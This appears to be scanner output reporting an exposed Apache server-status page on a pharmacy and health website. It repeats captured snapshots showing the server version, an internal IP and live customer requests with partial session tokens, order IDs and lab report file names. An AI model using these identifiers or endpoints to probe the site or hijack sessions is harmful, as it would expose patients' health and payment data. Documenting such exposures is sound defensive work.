/mart-catalog-api/product/getCompleteProductInformation HT 0-2612169430/4/602469_ 0.200101037128180.00.013309.08 23.57.76.48http/1.1www.medplusmart.com:443GET /doctors-api/getUpcomingConsultations?tokenId=F6FF9622C53C3 0-2612169430/4/602319_ 0.2106916334640.00.013337.34 23.61.0.82http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-2612169430/5/600771_ 0.2002934795770.00.013346.28 95.101.181.71http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-26121694313/4/601494W 0.1600920874280.00.033319.31 95.101.181.71http/1.1www.medplusmart.com:443POST /mart-catalog-api/blog/getProductRelatedBlogs HTTP/1.1 0-2612169430/4/601656_ 0.220166932390500.00.013303.71 95.101.181.71http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=OROF003 0-2612169430/5/601359_ 0.22044927116420.00.013327.98 23.212.50.121http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-2612169439/4/601755W 0.1800921614180.00.013308.73 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-2612169430/5/601160_ 0.2208915752820.00.023281.17 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-2612169430/5/601029_ 0.22022990161900.00.043337.51 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=ABE7A30CA2178D 0-2612169430/5/601749_ 0.21012934815520.00.023347.62 23.11.215.79http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=5FF48B5375C29E 0-2612169430/5/600450_ 0.2206945831630.00.013309.04 23.203.63.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=ABE7A30CA217 0-2612169430/5/600738_ 0.23012952076240.00.013308.87 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2612169430/2/600897_ 0.210832934612940.00.023307.58 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22location%22 0-2612169430/5/601895_ 0.22099917950510.00.013316.22 23.203.63.38http/1.1www.medplusmart.com:443GET /my-profile/getWalletInfo?tokenId=CCBE6F75B90F3BB9C4893E71C 0-2612169430/4/600380_ 0.22014937913980.00.013293.34 23.57.76.48http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-2612169430/4/600551_ 0.22012946974790.00.023299.44 23.11.215.79http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=5FF48B5375C29E 0-2612169434/4/599831W 0.1800991286620.00.013254.52 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-2612169430/5/599625_ 0.22016941894300.00.023297.26 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=F6FF9622C53C36 0-2612169430/3/599904_ 0.191191240786760.00.013329.89 23.57.76.48http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-2612169430/4/600067_ 0.2308922996640.00.013272.55 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-2612169430/4/599810_ 0.2308970729630.00.013335.18 104.124.54.21http/1.1www.medplusmart.com:443GET /my-profile/getRetryPaymentInfoForCustomer?tokenId=A7599FED 0-2612169430/4/600364_ 0.191241015208320.00.013325.94 23.11.215.85http/1.1www.medplusmart.com:443GET /my-p
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce088adc45
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Monday, 03-Nov-2025 13:31:32 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 25 Parent Server MPM Generation: 24 Server uptime: 20 days 17 hours 13 minutes 29 seconds Server load: 0.11 0.11 0.07 Total accesses: 112932311 - Total Traffic: 603.8 GB - Total Duration: 18713193825 CPU Usage: u41.26 s60.35 cu81948.8 cs41519 - 6.9% CPU load 63.1 requests/sec - 353.7 kB/second - 5.6 kB/request - 165.703 ms/request 14 requests currently being processed, 0 workers gracefully restarting, 136 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 1996804yes3no000000 2999804no35yes30470311 3999950no54yes90410471 4999456no14yes20480111 Sum41106 1401360893 ................................................................ .......................G............_____W______________W_______ ____________________W_W__________W__W__W__W__W_______________WW_ ______W___________________________W_______W_______________...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-24-0/0/537667. 0.006618860923600.00.002959.05 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=70042F678D7BE2 0-24-0/0/538056. 0.0066119835982600.00.002965.91 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-24-0/0/537357. 0.00666826637940.00.002887.14 23.65.124.75http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-24-0/0/537673. 0.0066210850257820.00.002890.79 104.124.54.78http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-24-0/0/538912. 0.00661375815623450.00.002962.74 23.57.76.48http/1.1www.medplusmart.com:443GET /labcatalog/get-top-level-categories?tokenId=1DBDA48492A0B3 0-24-0/0/538536. 0.006660825643560.00.002941.12 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-24-0/0/538650. 0.00667831493560.00.002962.34 23.65.124.75http/1.1www.medplusmart.com:443GET /mart-catalog-api/clearShoppingCart?tokenId=5E3F127C21C0CD4 0-24-0/0/538260. 0.006641882732330.00.002955.73 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-24-0/0/536893. 0.0066189967098380.00.002934.89 23.61.0.82http/1.1www.medplusmart.com:443GET /product/ovario-tab_ovar0024?srsltid=AfmBOooHXdr7frVlBDriQo 0-24-0/0/538708. 0.0066173837330220.00.002991.79 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/downloadPdfFile?fileName=Report_3021973.pdf&pdf 0-24-0/0/536862. 0.0066863852152180.00.002963.55 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-24-0/0/538470. 0.0066154822652010.00.003002.57 23.212.50.119http/1.1www.medplusmart.com:443GET /product/atdom-md-10mg-tab_atdo0003?srsltid=AfmBOoqsl4iM9dE 0-24-0/0/537635. 0.0066127821272850.00.002965.05 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=ATDO000 0-24-0/0/537214. 0.00667829141590.00.002965.29 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/blog/getBlogPostsList?SEARCH_CRITERIA=%7B 0-24-0/0/537633. 0.00661003878546500.00.003000.80 104.124.54.78http/1.1www.medplusmart.com:443POST /mart-catalog-api/general/getCategoryProducts HTTP/1.1 0-24-0/0/538706. 0.00668928173390.00.002933.15 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=542659EAD64A6457 0-24-0/0/537896. 0.006663812996390.00.002974.62 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-24-0/0/536850. 0.006692829939790.00.002989.46 23.203.63.38http/1.1www.medplusmart.com:443GET /medplusSubscription/getSubscriptions?tokenId=3991DC6EADD40 0-24-0/0/537411. 0.00662816580170.00.002956.02 23.212.50.121http/1.1www.medplusmart.com:443GET /manifest.json HTTP/1.1 0-24-0/0/537843. 0.00669823288560.00.002939.34 23.65.124.43http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=5E3F127C21C 0-24-0/0/537869. 0.00667824780110.00.002978.66 23.62.101.38http/1.1www.medplusmart.com:443GET /mart-catalog-api/getQuickOfferBanners?tokenId=4960EBEE2496 0-24-0/0/537643. 0.006615818704380.00.002937.13 23.57.76.28http/1.1www.medplusmart.com:443POST /mart-common-api/saveFCMToken HTTP/1.1 0-24-0/0/536939. 0.0066515818455260.00.002913.35 23.212.50.121http/1.1www.medplusmart.com:443GET /my-profile/getOrderForCustomerReview?tokenId=19A55DAA0D339 0-24-0/0/537068. 0.006681886948400.00.002981.49 23.65.124.43http/1.1www.medplusmart.com:443GET /my-profile/getNotifications?tokenId=5E3F127C21C0CD4991205E 0-24-0/0/537899. 0.0066516822175780.00.002989.49 23.57.76.28http/1.1www.medplusmart.com:443POST /my-profile/getInvoiceItems HTTP/1.1 0-24-0/0/537543. 0.006660826191190.00.002942.39 23.212.50.121http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-24-0/0/536692. 0.006677851277040.00.002956.60 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-24-0/0/536904. 0.006656831696020.00.002946.00 23.203.63.38http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-24-0/0/537425. 0.006614820640690.00.002931.84 23.65.124.43http/1.1www.medplusmart.com:443GET /labcatalog/get-separator-banners?REQUEST_OBJ=%7B%22request 0-24-0/0/536460. 0.006619836502990.00.002921.51 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-checkout/setDeliveryDetails HTTP/1.1 0-24-0/0/536746. 0.00668845247530.00.002939.34 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=5E 0-24-0/0/535829. 0.00667891615520.00.002901.57 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getEmergencyMessages?tokenId=863D4D058759 0-24-0/0/536004. 0.006610840608760.00.002931.65 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-checkout/getPaymentPageSummary?tokenId=5E3F127C21C0CD 0-24-0/0/536465. 0.0066701138479130.00.002967.14 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-24-0/0/536739. 0.0066108816769690.00.002916.86 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-24-0/0/535612. 0.006647874197720.00.002959.40 23.61.0.82http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-24-0/0/537132. 0.0066138911299260.00.002969.47 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=NS_1000 0-24-0/0/535266. 0.006661878009930.00.002947.63 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce3257b7b3
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Sunday, 02-Nov-2025 09:15:29 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 19 days 12 hours 57 minutes 26 seconds Server load: 0.00 0.02 0.00 Total accesses: 105608128 - Total Traffic: 565.0 GB - Total Duration: 17606291913 CPU Usage: u28.84 s51.74 cu76824.4 cs38980.9 - 6.86% CPU load 62.6 requests/sec - 350.9 kB/second - 5.6 kB/request - 166.713 ms/request 13 requests currently being processed, 0 workers gracefully restarting, 137 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 0888434no17yes20480141 1888758no48yes40460421 3888629no42yes70430362 Sum30107 1301370924 _________________________________W_____________R___W__W_________ ____________________W____________W__............................ ......................__W_____W___________WW_________________W__ W____W__........................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-238884340/109/502196_ 5.830640766373710.01.762784.48 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22pinCode%22: 0-238884340/104/502489_ 5.8116785674050.00.402779.80 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/getEmergencyMessages?tokenId=FA5FF53BD085 0-238884340/111/501929_ 5.83079776796860.00.502695.69 104.124.54.78http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-238884340/108/502213_ 5.8018798929880.00.442714.09 23.61.0.82http/1.1www.medplusmart.com:443GET /my-profile/getHomeTrackOrderStatusInfo?tokenId=480024D6871 0-238884340/118/503197_ 5.84059766883610.00.512763.62 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=F29ADC6 0-238884340/117/503233_ 5.830269771788380.00.512763.08 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/general/getCategoryProducts HTTP/1.1 0-238884340/120/503055_ 5.83014781013130.00.432774.81 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-238884340/116/503126_ 5.83012824315830.00.432763.48 95.101.181.71http/1.1www.medplusmart.com:443GET /labcatalog/getDiagnosticsCategories?labCatalogVersionNoKey 0-238884340/116/501420_ 5.840117917366460.00.462742.10 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=INSU003 0-238884340/119/503064_ 5.8016790512020.00.752789.36 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=4A89531F154 0-238884340/109/501695_ 5.8025796903780.00.422782.51 23.57.76.28http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-238884340/116/503030_ 5.8309773559390.00.502809.69 23.62.101.22http/1.1www.medplusmart.com:443POST /mart-checkout/setPrescriptionDetails HTTP/1.1 0-238884340/118/502274_ 5.83011771048710.00.492768.18 23.62.101.22http/1.1www.medplusmart.com:443GET /mart-checkout/getLocationDeliveryDetails?tokenId=50D1F99D8 0-238884340/109/501968_ 5.83122768435760.00.522760.04 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-checkout/getAddressAndCommunities?tokenId=89C9B8919A6 0-238884340/113/502165_ 5.78089823707680.00.462815.35 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=00CA7ED 0-238884340/114/503318_ 5.84020876883660.00.482760.82 23.62.101.22http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-238884340/107/502301_ 5.83010764049080.00.362793.24 23.203.63.47http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-238884340/121/501765_ 5.8029774634710.00.462790.45 23.61.0.82http/1.1www.medplusmart.com:443GET /my-profile/getPromotionTemplateDetails?tokenId=480024D6871 0-238884340/108/501936_ 5.811120767017940.00.452770.24 23.61.0.82http/1.1www.medplusmart.com:443POST /labCheckout/add-test-to-cart HTTP/1.1 0-238884340/111/502915_ 5.7810764581330.00.472750.69 95.101.181.71http/1.1www.medplusmart.com:443POST /api/gql HTTP/1.1 0-238884340/109/502504_ 5.830114771958360.00.452773.86 104.124.54.78http/1.1www.medplusmart.com:443POST /mart-common-api/validateToken HTTP/1.1 0-238884340/119/502360_ 5.8219767099630.00.552735.16 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getPopularBrands?tokenId=6BB7E64661D73D1B 0-238884340/108/501771_ 5.740758765067410.00.472732.02 23.50.232.156http/1.1www.medplusmart.com:443POST /mart-checkout/modifyCart HTTP/1.1 0-238884340/110/501758_ 5.8309835047280.00.462787.22 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=93B59150475026 0-238884340/110/502468_ 5.802803769089730.00.442774.95 95.101.181.71http/1.1www.medplusmart.com:443GET /manufacturer/PRIS-HEALTHCARE-PVT-LTD HTTP/1.1 0-238884340/112/502239_ 5.8217776664000.00.472738.93 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-238884340/108/501530_ 5.8114787932660.00.492754.20 104.124.54.78http/1.1www.medplusmart.com:443GET /mart-catalog-api/blog/getBlogPostsList?SEARCH_CRITERIA=%7B 0-238884340/115/501520_ 5.82110776164420.00.462761.57 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=88282044A7E1F5 0-238884340/108/501926_ 5.82166771939400.01.662741.01 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getDynamicSectionProducts?tokenId=6BB7E64 0-238884340/115/501216_ 5.830201784922570.01.072729.14 23.212.50.119http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getCompleteProductInformation HT 0-238884340/98/501374_ 5.811117796368180.00.432741.09 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-common-api/generateToken HTTP/1.1 0-238884340/110/500567_ 5.830292840856280.00.452703.63 95.101.181.71http/1.1www.medplusmart.com:443GET /product/zenflox-oz-tablet_ZENF0007 HTTP/1.1 0-238884340/109/500714_ 5.8025787021660.00.452738.90 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-238884344/112/501180W 5.80001085051100.00.412769.11 23.62.101.22http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=CETA010 0-238884340/109/501375_ 5.80110767905740.00.452722.35 23.203.63.47http/1.1www.medplusmart.com:443GET /my-profile/getRetryPaymentInfoForCustomer?tokenId=4A89531F 0-238884340/109/500324_ 5.82147822676040.00.482746.77 95.101.181.71http/1.1www.medplusmart.com:443GET /product/cardiolax-orange-90gm-powder_card0074 HTTP/1.1 0-238884340/120/501778_ 5.82118859479040.00.542780.14 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-catalog-api/getCatalogCategory?tokenId=6BB7E64661D73D 0-238884340/114/499721_ 5.801135825190860.00.512765.88 23.212.50.119http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce392f0362
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Monday, 27-Oct-2025 15:42:19 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 13 days 19 hours 24 minutes 16 seconds Server load: 0.12 0.10 0.05 Total accesses: 72337772 - Total Traffic: 393.6 GB - Total Duration: 12281742608 CPU Usage: u29.45 s40.61 cu52771.6 cs26732.9 - 6.67% CPU load 60.6 requests/sec - 346.0 kB/second - 5.7 kB/request - 169.783 ms/request 9 requests currently being processed, 0 workers gracefully restarting, 141 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 1362059no41yes40460342 3361818no8yes0050071 4361933no18yes50450131 Sum3067 901410544 ..................................................W_____________ ____W______W_____________________W__............................ ......................__________________________________________ ________________W_____W_________W______W___________W______...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-17-0/0/337267. 0.006423518083340.00.001901.08 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337501. 0.006414527564550.00.001926.95 23.65.124.43http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/337630. 0.006474518208780.00.001854.26 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337353. 0.00648542230190.00.001852.82 23.11.215.85http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-17-0/0/338130. 0.0064408522098940.00.001879.66 23.65.124.43http/1.1www.medplusmart.com:443GET /labOrderHistory/printIndividualReport?orderId=2998514&pati 0-17-0/0/337898. 0.0064250519350470.00.001912.22 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getInvoiceItems HTTP/1.1 0-17-0/0/338307. 0.006460508269050.00.001915.58 95.101.181.21http/1.1www.medplusmart.com:443GET /product/rabulcer-20mg-tab_rabu0003 HTTP/1.1 0-17-0/0/338163. 0.006443559127630.00.001894.75 23.61.0.82http/1.1www.medplusmart.com:443GET /product/it-mac-200mg-cap_it_m0001?srsltid=AfmBOooKKuQ61dIh 0-17-0/0/336710. 0.006454657333420.00.001888.45 23.203.63.47http/1.1www.medplusmart.com:443GET /labcatalog/get-subscription-status?tokenId=D713E001DDF2ECF 0-17-0/0/338500. 0.0064123524425670.00.001913.58 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-common-api/get-static-content-for-item?itemId=MENT000 0-17-0/0/337765. 0.006454537102310.00.001917.22 95.101.181.21http/1.1www.medplusmart.com:443GET /product/cefadur-250-rediuse-syp_cefa0011 HTTP/1.1 0-17-0/0/338304. 0.006470514125590.00.001922.05 23.65.124.43http/1.1www.medplusmart.com:443POST /mart-catalog-api/getDiscountForProductsSearch HTTP/1.1 0-17-0/0/337291. 0.006437515699380.00.001876.78 95.101.181.21http/1.1www.medplusmart.com:443POST /mart-catalog-api/getCartInfoFromRedis HTTP/1.1 0-17-0/0/337109. 0.00641088517901200.00.001878.90 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-checkout/getCartInfo?useComplimentary=true&tokenId=7D 0-17-0/0/337266. 0.00645573273090.00.001939.11 23.203.63.47http/1.1www.medplusmart.com:443GET /mart-common-api/checkAppUpdate?phoneVersion=15&minSdkVersi 0-17-0/0/338103. 0.006437626749470.00.001901.24 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337672. 0.006445517649000.00.001921.33 23.57.76.48http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-17-0/0/337265. 0.0064636524262910.00.001926.46 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-common-api/setLocality?locationInfo=%7B%22pinCode%22: 0-17-0/0/337549. 0.006453515838760.00.001910.52 95.101.181.21http/1.1www.medplusmart.com:443GET /product/clobyte-s-30ml-lotion_clob0085 HTTP/1.1 0-17-0/0/337887. 0.00646518845140.00.001858.42 95.101.181.21http/1.1www.medplusmart.com:443GET /doctors-api/getDoctorsCategories?doctorLatLongVersionKey=& 0-17-0/0/337618. 0.006450511834730.00.001899.53 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/338013. 0.006448512978130.00.001883.50 95.101.181.21http/1.1www.medplusmart.com:443GET /product/mat-q-10-tab_mat_0005 HTTP/1.1 0-17-0/0/337032. 0.0064622517624300.00.001887.04 23.212.50.119http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-17-0/0/337307. 0.006464562104880.00.001877.94 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337487. 0.006418515928420.00.001928.18 23.65.124.75http/1.1www.medplusmart.com:443GET /my-profile/getCustomerDetails?reqFromMyAccount=true&loginT 0-17-0/0/337706. 0.0064138529840600.00.001863.87 23.65.124.43http/1.1www.medplusmart.com:443POST /my-profile/getOrderItems HTTP/1.1 0-17-0/0/336588. 0.00648524105570.00.001889.96 23.57.76.28http/1.1www.medplusmart.com:443GET /mart-common-api/getOrderCancellationReasons?orderType=P&to 0-17-0/0/337182. 0.006482522518370.00.001908.58 23.65.124.43http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337586. 0.006414520746830.00.001861.92 23.212.50.119http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/336822. 0.0064688532804210.00.001850.17 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearchResults?searchCriteria=%7 0-17-0/0/336611. 0.006429538378910.00.001860.37 95.101.181.21http/1.1www.medplusmart.com:443POST /mart-catalog-api/product/getAlternateProducts HTTP/1.1 0-17-0/0/336365. 0.0064213585113720.00.001847.41 95.101.181.71http/1.1www.medplusmart.com:443GET /product/cefadur-250-rediuse-syp_cefa0011 HTTP/1.1 0-17-0/0/335892. 0.00644544172000.00.001867.30 23.65.124.75http/1.1www.medplusmart.com:443GET /needHelp/pharmacy/35492901?SESSIONID=C033D546AA91044F75183 0-17-0/0/336627. 0.006413838986930.00.001920.28 23.62.101.38http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/336843. 0.00649519575470.00.001859.09 23.212.50.119http/1.1www.medplusmart.com:443GET /mart-catalog-api/getBannerDetails?REQUEST_OBJ=%7B%22catalo 0-17-0/0/336223. 0.0064185668566516470.00.001889.49 23.62.101.22http/1.1www.medplusmart.com:443GET /bot/ HTTP/1.1 0-17-0/0/337849. 0.006465503335170.00.001923.39 23.57.76.48http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/336327. 0.0064854546165820.00.001904.52 95.101.181.21http/1.1www.medplusmart.com:443GET /manufacturer/REICURI-PVT-LTD HTTP/1.1 0-17-0/0/336889. 0.006495
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b77ba0ceb77ba0ce0507ba5f
Apache Status Apache Server Status for www.medplusmart.com (via 172.25.0.56) Server Version: Apache/2.4.58 (Ubuntu) OpenSSL/3.0.13 Server MPM: event Server Built: 2024-07-17T18:55:23 Current Time: Monday, 27-Oct-2025 15:41:53 IST Restart Time: Monday, 13-Oct-2025 20:18:02 IST Parent Server Config. Generation: 18 Parent Server MPM Generation: 17 Server uptime: 13 days 19 hours 23 minutes 50 seconds Server load: 0.19 0.11 0.06 Total accesses: 72335701 - Total Traffic: 393.6 GB - Total Duration: 12281468771 CPU Usage: u27.77 s39.78 cu52771.6 cs26732.9 - 6.67% CPU load 60.6 requests/sec - 346.0 kB/second - 5.7 kB/request - 169.784 ms/request 11 requests currently being processed, 0 workers gracefully restarting, 139 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 1362059no40yes90410341 3361818no13yes10490111 4361933no30yes10490281 Sum3083 1101390733 ..................................................___W__________ __W____W________W_W____W___W_____W_W............................ ......................________W_________________________________ _________________________________________________________W...... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-17-0/0/337267. 0.003823518083340.00.001901.08 23.11.215.85http/1.1www.medplusmart.com:443GET /mart-catalog-api/getProductSearch?searchCriteria=%7B%22sea 0-17-0/0/337501. 0.003814527564550.00.001926.95 23.65.124.43http/1.1www.medplusmart.com:443GET /medplusSubscription/secure/getMdxPointsTransactionHistoryD 0-17-0/0/337630. 0.003874518208780.00.001854.26 